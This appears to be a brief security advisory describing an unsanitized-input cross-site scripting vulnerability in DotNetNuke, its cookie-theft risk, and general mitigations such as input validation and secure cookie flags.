DotNetNuke Cross-Site Scripting Vulnerability

DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate web content. Additionally, applications should use a secure flag when setting cookies to prevent them from being sent over unencrypted connections.
